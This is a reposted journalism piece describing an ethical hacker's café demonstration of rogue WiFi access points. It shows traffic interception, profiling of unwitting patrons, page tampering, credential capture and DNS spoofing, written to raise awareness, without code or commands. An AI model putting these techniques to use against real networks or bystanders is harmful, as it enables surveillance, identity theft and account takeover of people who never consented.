Maybe Better If You Don’t Read This Story on Public WiFi.

We took a hacker to a café and, in 20 minutes, he knew where everyone else was born, what schools they attended, and the last five things they googled.


By Maurits Martijn, from De Correspondent
Translated from Dutch by Jona Meijers
Illustrations by Kristina Collantes



In his backpack, Wouter Slotboom, 34, carries around a small black device, slightly larger than a pack of cigarettes, with an antenna on it. I meet Wouter by chance at a random cafe in the center of Amsterdam. It is a sunny day and almost all the tables are occupied. Some people talk, others are working on their laptops or playing with their smartphones.
Wouter removes his laptop from his backpack, puts the black device on the table, and hides it under a menu. A waitress passes by and we ask for two coffees and the password for the WiFi network. Meanwhile, Wouter switches on his laptop and device, launches some programs, and soon the screen starts to fill with green text lines. It gradually becomes clear that Wouter’s device is connecting to the laptops, smartphones, and tablets of cafe visitors.

On his screen, phrases like “iPhone Joris” and “Simone’s MacBook” start to appear. The device’s antenna is intercepting the signals that are being sent from the laptops, smartphones, and tablets around us.
More text starts to appear on the screen. We are able to see which WiFi networks the devices were previously connected to. Sometimes the names of the networks are composed of mostly numbers and random letters, making it hard to trace them to a definite location, but more often than not, these WiFi networks give away the place they belong to.
We learn that Joris had previously visited McDonald’s, probably spent his vacation in Spain (lots of Spanish-language network names), and had been kart-racing (he had connected to a network belonging to a well-known local kart-racing center). Martin, another café visitor, had been logged on to the network of Heathrow airport and the American airline Southwest. In Amsterdam, he’s probably staying at the White Tulip Hostel. He had also paid a visit to a coffee shop called The Bulldog.

Session 1:

Let everyone connect to our fake network




The waitress serves us our coffee and hands us the WiFi password. After Slotboom is connected, he is able to provide all the visitors with an internet connection and to redirect all internet traffic through his little device.
Most smartphones, laptops, and tablets automatically search and connect to WiFi networks. They usually prefer a network with a previously established connection. If you have ever logged on to the T-Mobile network on the train, for example, your device will search for a T-Mobile network in the area.
Slotboom’s device is capable of registering these searches and appearing as that trusted WiFi network. I suddenly see the name of my home network appear on my iPhone’s list of available networks, as well as my workplace, and a list of cafes, hotel lobbies, trains, and other public places I’ve visited. My phone automatically connects itself to one of these networks, which all belong to the black device.
Slotboom can also broadcast a fictitious network name, making users believe they are actually connecting to the network of the place they’re visiting. For example, if a place has a WiFi network consisting of random letters and numbers (Fritzbox xyz123), Slotboom is able to provide the network name (Starbucks). People, he says, are much more willing to connect to these.
We see more and more visitors log on to our fictitious network. The siren song of the little black device appears to be irresistible. Already 20 smartphones and laptops are ours. If he wanted to, Slotboom could now completely ruin the lives of the people connected: He can retrieve their passwords, steal their identity, and plunder their bank accounts. Later today, he will show me how. I have given him permission to hack me in order to demonstrate what he is capable of, though it could be done to anyone with a smartphone in search of a network, or a laptop connecting to a WiFi network.
Everything, with very few exceptions, can be cracked.
The idea that public WiFi networks are not secure is not exactly news. It is, however, news that can’t be repeated often enough. There are currently more than 1.43 billion smartphone users worldwide and more than 150 million smartphone owners in the U.S. More than 92 million American adults own a tablet and more than 155 million own a laptop. Each year the worldwide demand for more laptops and tablets increases. In 2013, an estimated 206 million tablets and 180 million laptops were sold worldwide. Probably everyone with a portable device has once been connected to a public WiFi network: while having a coffee, on the train, or at a hotel.
The good news is that some networks are better protected than others; some email and social media services use encryption methods that are more secure than their competitors. But spend a day walking in the city with Wouter Slotboom, and you’ll find that almost everything and everyone connected to a WiFi network can be hacked. A study from threat intelligence consultancy Risk Based Security estimates that more than 822 million records were exposed worldwide in 2013, including credit card numbers, birth dates, medical information, phone numbers, social security numbers, addresses, user names, emails, names, and passwords. Sixty-five percent of those records came from the U.S. According to IT security firm Kaspersky Lab, in 2013 an estimated 37.3 million users worldwide and 4.5 million Americans were the victim of phishing—or pharming—attempts, meaning payment details were stolen from hacked computers, smartphones, or website users.
Report after report shows that digital identity fraud is an increasingly common problem. Hackers and cybercriminals currently have many different tricks at their disposal. But the prevalence of open, unprotected WiFi networks does make it extremely easy for them. The Netherlands National Cyber ​​Security Center, a division of the Ministry of Security and Justice, did not issue the following advice in vain: “It is not advisable to use open WiFi networks in public places. If these networks are used, work or financial related activities should better be avoided.”
Slotboom calls himself an “ethical hacker,” or one of the good guys; a technology buff who wants to reveal the potential dangers of the internet and technology. He advises individuals and companies on how to better protect themselves and their information. He does this, as he did today, usually by demonstrating how easy it is to inflict damage. Because really, it’s child’s play: The device is cheap, and the software for intercepting traffic is very easy to use and is readily available for download. “All you need is 70 Euros, an average IQ, and a little patience,” he says. I will refrain from elaborating on some of the more technical aspects, such as equipment, software, and apps needed to go about hacking people.

Session 2:

Scanning for name, passwords, and sexual orientation




Armed with Slotboom’s backpack, we move to a coffeehouse that is known for the beautiful flowers drawn in the foam of the lattes, and as a popular spot for freelancers working on laptops. This place is now packed with people concentrating on their screens.
Slotboom switches on his equipment. He takes us through the same steps, and within a couple of minutes, 20 or so devices are connected to ours. Again we see their Mac-addresses and login history, and in some cases their owners’ names. At my request, we now go a step further.
Slotboom launches another program (also readily available for download), which allows him to extract even more information from the connected smartphones and laptops. We are able to see the specifications of the mobile phone models (Samsung Galaxy S4), the language settings for the different devices, and the version of the operating system used (iOS 7.0.5). If a device has an outdated operating system, for example, there are always known “bugs,” or holes in the security system that can be easily exploited. With this kind of information, you have what you need to break into the operating system and take over the device. A sampling of the coffeehouse customers reveals that none of the connected devices have the latest version of the operating system installed. For all these legacy systems, a known bug is listed online.
We can now see some of the actual internet traffic of those around us. We see that someone with a MacBook is browsing the site Nu.nl. We can see that many devices are sending documents using WeTransfer, some are connecting to Dropbox, and some show activity on Tumblr. We see that someone has just logged on to FourSquare. The name of this person is also shown, and, after googling his name, we recognize him as the person sitting just a few feet away from us.
Information comes flooding in, even from visitors who are not actively working or surfing. Many email programs and apps constantly make contact with their servers—a necessary step for a device to retrieve new emails. For some devices and programs, we are able to see what information is being sent, and to which server.
And now it’s getting really personal. We see that one visitor has the gay dating app Grindr installed on his smartphone. We also see the name and type of the smartphone he’s using (iPhone 5s). We stop here, but it would be a breeze to find out to who the phone belongs to. We also see that someone’s phone is attempting to connect to a server in Russia, sending the password along with it, which we are able to intercept.

Session 3:

Obtaining information on occupation, hobbies, and relational problems




Many apps, programs, websites, and types of software make use of encryption technologies. These are there to ensure that the information sent and received from a device is not accessible to unauthorized eyes. But once the user is connected to Slotboom’s WiFi network, these security measures can be circumvented relatively easily, with the help of decryption software.
To our shared surprise, we see an app sending personal information to a company that sells online advertising. Among other things, we see the location data, technical information of the phone, and information of the WiFi network. We can also see the name (first and last) of a woman using the social bookmarking website Delicious. Delicious allows users to share websites—bookmarks—they are interested in. In principle, the pages that users of Delicious share are available publicly, yet we can’t help feeling like voyeurs when we realize just how much we are able to learn about this woman on the basis of this information.
First we google her name, which immediately allows us to determine what she looks like and where in the coffeehouse she is sitting. We learn that she was born in a different European country and only recently moved to the Netherlands. Through Delicious we discover that she’s been visiting the website of a Dutch language course and she has bookmarked a website with information on the Dutch integration course.
In less than 20 minutes, here’s what we’ve learned about the woman sitting 10 feet from us: where she was born, where she studied, that she has an interest in yoga, that she’s bookmarked an online offer for a anti-snore mantras, recently visited Thailand and Laos, and shows a remarkable interest in sites that offer tips on how to save a relationship.
Slotboom shows me some more hacker tricks. Using an app on his phone, he is able to change specific words on any website. For example, whenever the word “Opstelten” (the name of a Dutch politician) is mentioned, people see the word “Dutroux” (the name of a convicted serial killer) rendered on the page instead. We tested it and it works. We try another trick: Anyone loading a website that includes pictures gets to see a picture selected by Slotboom. This all sounds funny if you’re looking for some mischief, but it also makes it possible to load images of child pornography on someone’s smartphone, the possession of which is a criminal offense.

Password intercepted


We visit yet another cafe. My last request to Slotboom is to show me what he would do if he wanted to really harm me. He asks me to go to Live.com (the Microsoft email site) and enter a random username and password. A few seconds later, the information I just typed appears on his screen. “Now I have the login details of your email account,” Slotboom says. “The first thing I would do is change the password of your account and indicate to other services you use that I have forgotten my password. Most people use the same email account for all services. And those new passwords will then be sent to your mailbox, which means I will have them at my disposal as well.” We do the same for Facebook: Slotboom is able to intercept the login name and password I entered with relative ease.
Another trick that Slotboom uses is to divert my internet traffic. For example, whenever I try to access the webpage of my bank, he has instructed his program to re-direct me to a page he owns: a cloned site that appears to be identical to the trusted site, but is in fact completely controlled by Slotboom. Hackers call this DNS spoofing. The information I entered on the site is stored on the server owned by Slotboom. Within 20 minutes he’s obtained the login details, including passwords for my Live.com, SNS Bank, Facebook, and DigiD accounts.
I will never again be connecting to an insecure public WiFi network without taking security measures.


This article originally appeared in Dutch online journalism platform, De Correspondent. All names in this article are fictitious, except for Wouter Slotboom’s. We handled the intercepted data with the utmost care and erased it immediately after our last meeting.

Popular posts from this blog

UK GENERAL ELECTIONS:Inquiry announced into memo alleging Sturgeon wants Tory election victory.

Image
Civil service instigates investigation into leaked memo from Foreign Office about supposed comments made in February Scotland’s first minister, Nicola Sturgeon, with David Cameron in her office at the Scottish parliament earlier this year. Photograph: WPA Pool/Getty A civil service inquiry into a leaked memo which claimed that Nicola Sturgeon privately wanted to see David Cameron remain in power after the general election has been instigated following calls from the First Minister. Ms Sturgeon described the allegation as “100% untrue” and accused Whitehall of “dirty tricks”.
Read more

Sandhurst's sheikhs: Why do so many Gulf royals receive military training in the UK? A parade outside the building at Sandhurst Continue reading the main story In today's Magazine The death list that names 5,000 victims Is this woman an apostate? Voices from a WW1 prison camp The Swiss selfie scandal Generations of foreign royals - particularly from the Middle East - have learned to be military leaders at the UK's Sandhurst officer training academy. But is that still a good idea, asks Matthew Teller. Since 1812, the Royal Military Academy Sandhurst, on the Surrey/Berkshire border, has been where the British Army trains its officers. It has a gruelling 44-week course testing the physical and intellectual skills of officer cadets and imbuing them with the values of the British Army. Alongside would-be British officers, Sandhurst has a tradition of drawing cadets from overseas. Many of the elite families of the Middle East have sent their sons and daughters. Perhaps the most notable was King Hussein of Jordan. Continue reading the main story Find out more Matthew Teller presents Sandhurst and the Sheikhs, a Whistledown production for BBC Radio 4, on Wednesday 27 August 2014 at 11:00 BST It will be available on iPlayer shortly after broadcast Four reigning Arab monarchs are graduates of Sandhurst and its affiliated colleges - King Abdullah of Jordan, King Hamad of Bahrain, Sheikh Tamim, Emir of Qatar, and Sultan Qaboos of Oman. Past monarchs include Sheikh Saad, Emir of Kuwait, and Sheikh Hamad, Emir of Qatar. Sandhurst's links have continued from the time when Britain was the major colonial power in the Gulf. "One thing the British were excellent at was consolidating their rule through spectacle," says Habiba Hamid, former foreign policy strategist to the rulers of Dubai and Abu Dhabi. "Pomp, ceremony, displays of military might, shock and awe - they all originate from the British military relationship." Sheikh Hamad Bin Isa Al Khalifa, King Abdullah, Sultan Qaboos Sandhurst alumni: King Hamad of Bahrain, King Abdullah of Jordan and Sultan Qaboos of Oman It's a place where future leaders get to know each other, says Michael Stephens, deputy director of the Royal United Services Institute, Qatar. And Sandhurst gives the UK influence in the Gulf. "The [UK] gets the kind of attention from Gulf policy elites that countries of our size, like France and others, don't get. It gives us the ability to punch above our weight. "You have people who've spent time in Britain, they have… connections to their mates, their teachers. Familiarity in politics is very beneficial in the Gulf context." "For British people who are drifting around the world, as I did as a soldier," says Brigadier Peter Sincock, former defence attache to Saudi Arabia, "you find people who were at Sandhurst and you have an immediate rapport. I think that's very helpful, for example, in the field of military sales." The Emir of Dubai Mohammad bin Rashid Al Maktoum with his son after his Passing Out Parade at Sandhurst in 2006 Sheikh Mohammad bin Rashid Al Maktoum, Emir of Dubai, with his son in uniform at Sandhurst in 2006 Her Majesty The Queen's Representative His Highness Sheikh Hamad bin Khalifa Al-Thani, The Emir of Qatar inspects soldiers during the 144th Sovereign's Parade held at The Royal Military Academy Sandhurst on April 8, 2004 in Camberley, England. Some 470 Officer cadets took part of which 219 were commissioned into the British Army Hamad bin Khalifa Al-Thani, the Emir of Qatar until 2013, inspects soldiers at Sandhurst in 2004 Emotion doesn't always deliver. In 2013, despite the personal intervention of David Cameron, the UAE decided against buying the UK's Typhoon fighter jets. But elsewhere fellow feeling is paying dividends. "The Gulf monarchies have become important sources of capital," says Jane Kinninmont, deputy head of the Middle East/North Africa programme at the foreign affairs think tank Chatham House. "So you see the tallest building in London being financed by the Qataris, you see UK infrastructure and oilfield development being financed by the UAE. There's a desire - it can even seem like a desperation - to keep them onside for trade reasons." British policy in the Gulf is primarily "mercantile", says Dr Kristian Coates Ulrichsen, of the Baker Institute in Houston, Texas. Concerns over human rights and reform are secondary. The Shard at dusk The Shard was funded by Qatari investors In 2012 Sandhurst accepted a £15m donation from the UAE for a new accommodation block, named the Zayed Building after that country's founding ruler. In March 2013, Sandhurst's Mons Hall - a sports centre - was reopened as the King Hamad Hall, following a £3m donation from the monarch of Bahrain, who was educated at one of Sandhurst's affiliated colleges. The renaming proved controversial, partly because of the perceived slight towards the 1,600 British casualties at the Battle of Mons in August 1914 - and partly because of how Hamad and his government have dealt with political protest in Bahrain over the last three years. A critic might note that the third term of Sandhurst's Officer Commissioning Course covers counter-insurgency techniques and ways to manage public disorder. Since tension between Bahrain's majority Shia population and minority Sunni ruling elite boiled over in 2011, more than 80 civilians have died at the hands of the security forces, according to opposition estimates, though the government disputes the figures. Thirteen police officers have also lost their lives in the clashes. "The king has always felt that Sandhurst was a great place," says Sincock, chairman of the Bahrain Society, which promotes friendship between the UK and Bahrain. "Something like 20 of his immediate family have been there as cadets. He didn't really understand why there was such an outcry." David Cameron and King Hamad David Cameron meeting King Hamad in 2012... A protester is held back by police ... while protesters nearby opposed the Bahrain ruler's human rights record Crispin Black, a Sandhurst graduate and former instructor, says the academy should not have taken the money. "Everywhere you look there's a memorial to something, a building or a plaque that serves as a touchstone that takes you right to the heart of British military history. Calling this hall 'King Hamad Hall' ain't gonna do that." Sandhurst gave a written response to the criticism. "All donations to Sandhurst are in compliance with the UK's domestic and international legal obligations and our values as a nation. Over the years donations like this have saved the UK taxpayer a considerable amount of money." But what happens when Sandhurst's friends become enemies? In 2001, then-prime minister Tony Blair visited Damascus, marking a warming of relations between the UK and Syria. Shortly after, in 2003, Sandhurst was training officers from the Syrian armed forces. Now, of course, Syria is an international pariah. Journalist Michael Cockerell has written about Libyan dictator Colonel Gaddafi's time at the Army School of Education in Beaconsfield in 1966: "Three years [later], Gaddafi followed a tradition of foreign officers trained by the British Army. He made use of his newfound knowledge to seize political power in his own country." Ahmed Ali Sandhurst-trained Ahmed Ali was a key player in the Egyptian military's removal of Islamist President Mohammed Morsi That tradition persists. In the 1990s Egyptian colonel Ahmed Ali attended Sandhurst. In 2013 he was one of the key figures in the Egyptian military's removal of Islamist President Mohammed Morsi, now rewarded by a post in President Sisi's inner circle of advisers. In the late 1990s there were moves by the British government under Tony Blair to end Sandhurst's training of overseas cadets. Major-General Arthur Denaro, Middle East adviser to the defence secretary and commandant at Sandhurst in the late 1990s, describes the idea as part of the "ethical foreign policy" advocated by the late Robin Cook, then-foreign secretary. Tony Blair and Robin Cook Tony Blair and Robin Cook at one point planned to end Sandhurst's training of overseas cadets The funeral of King Hussein in 1999 appears to have scuppered the plan. "Coming to that funeral were the heads of state of almost every country in the world - and our prime minister was there, Tony Blair," says Major-General Denaro. "He happened to see me talking to heads of state - the Sultan of Brunei, the Sultan of Oman, the Bahrainis, the Saudis - and he said 'How do you know all these guys?' The answer was because they went to Sandhurst." Today, Sandhurst has reportedly trained more officer cadets from the UAE than from any other country bar the UK. The May 2014 intake included 72 overseas cadets, around 40% of whom were from the Middle East. "In the future," says Maryam al-Khawaja, acting president of the Bahrain Centre for Human Rights, "people will look back at how much Britain messed up in the [Middle East] because they wanted to sell more Typhoon jets to Bahrain, rather than stand behind the values of human rights and democracy." "It's one thing saying we're inculcating benign values, but that's not happening," says Habiba Hamid. Sandhurst is "a relic of the colonial past. They're not [teaching] the civic values we ought to find in democratically elected leaders." line Who else went to Sandhurst? Princes William and Harry, Winston Churchill, Ian Fleming, Katie Hopkins, Antony Beevor, James Blunt, Josh Lewsey, Devon Harris (From left to right) Princes William and Harry Sir Winston Churchill Ian Fleming, creator of James Bond (but did not complete training) Katie Hopkins, reality TV star Antony Beevor, historian James Blunt, singer-songwriter Josh Lewsey, World Cup-winning England rugby player Devon Harris, member of Jamaica's first bobsleigh team line Sandhurst says that "building international relations through military exchanges and education is a key pillar of the UK's international engagement strategy". Sandhurst may be marvellous for the UK, a country where the army is subservient to government, but it is also delivering militarily-trained officers to Middle Eastern monarchies where, often, armies seem to exist to defend not the nation but the ruling family.

Image
Generations of foreign royals - particularly from the Middle East - have learned to be military leaders at the UK's Sandhurst officer training academy. But is that still a good idea, asks Matthew Teller. Since 1812, the Royal Military Academy Sandhurst, on the Surrey/Berkshire border, has been where the British Army trains its officers. It has a gruelling 44-week course testing the physical and intellectual skills of officer cadets and imbuing them with the values of the British Army. Alongside would-be British officers, Sandhurst has a tradition of drawing cadets from overseas. Many of the elite families of the Middle East have sent their sons and daughters. Perhaps the most notable was King Hussein of Jordan. Four reigning Arab monarchs are graduates of Sandhurst and its affiliated colleges - King Abdullah of Jordan, King Hamad of Bahrain, Sheikh Tamim, Emir of Qatar, and Sultan Qaboos of Oman. Past monarchs include Sheikh S
Read more

Ebola Outbreak: Guinea Declares Emergency As Overall Deaths From Ebola Rise To 1,069

Image
Health workers take passengers' temperatures infrared digital laser thermometers at the Felix Houphouet Boigny international airport in Abidjan on Aug. 13, 2014. Ivory Coast on Monday banned air travellers from Guinea, Liberia and Sierra Leone, the three countries worst-hit by the Ebola outbreak, and ordered its flagship carrier Air Cote d'Ivoire to cease flights to and from them. Reuters/Luc Gnago Guinea, one of the worst-hit West African nations in the ongoing Ebola outbreak, announced a state of emergency Wednesday. The World Health Organization, or WHO, also  said  that four new people died in Guinea between Aug. 10 and Aug. 11. The total death count in Guinea from the latest epidemic was estimated at 377 by WHO while the number of cases reported had risen to 510. Overa
Read more